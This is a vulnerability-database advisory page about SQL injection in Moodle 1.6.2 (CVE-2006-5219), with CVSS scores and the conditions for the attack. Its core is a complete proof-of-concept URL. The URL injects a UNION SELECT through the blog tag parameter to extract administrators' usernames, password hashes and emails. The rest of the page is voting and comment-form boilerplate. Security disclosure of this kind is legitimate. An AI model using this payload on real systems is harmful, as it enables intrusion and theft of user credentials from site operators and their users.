SQL injection - moodle 1.6.2

2006.10.12

Credit: disfigure (disfigure gmail com)

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2006-5219

CWE: CWE-89

CVSS Base Score: 5.1/10

Impact Subscore: 6.4/10

Exploitability Subscore: 4.9/10

Exploit range: Remote

Attack complexity: High

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

/****************************************/
http://www.w4cking.com
Product:
moodle 1.6.2
http://www.moodle.org
Vulnerability:
SQL injection
Notes:
- SQL injection can be used to obtain password hash
- the moodle blog "module" must be enabled
- guest access to the blog must be enabled
POC:
<target>/blog/index.php?tag=x%2527%20UNION%20SELECT%20%2527-1%20UNION%20
SELECT%201,1,1,1,1,1,1,username,password,1,1,1,1,1,1,1,username,password
,email%20FROM%20mdl_user%20RIGHT%20JOIN%20mdl_user_admins%20ON%20mdl_use
r.id%3dmdl_user_admins.userid%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1
,1,1,1,1,1,1,1%20FROM%20mdl_post%20p,%20mdl_blog_tag_instance%20bt,%20md
l_user%20u%20WHERE%201%3D0%2527,1,1,%25271
Original advisory (requires registration):
http://w4ck1ng.com/board/showthread.php?t=1305
/****************************************/

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

SQL injection - moodle 1.6.2

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.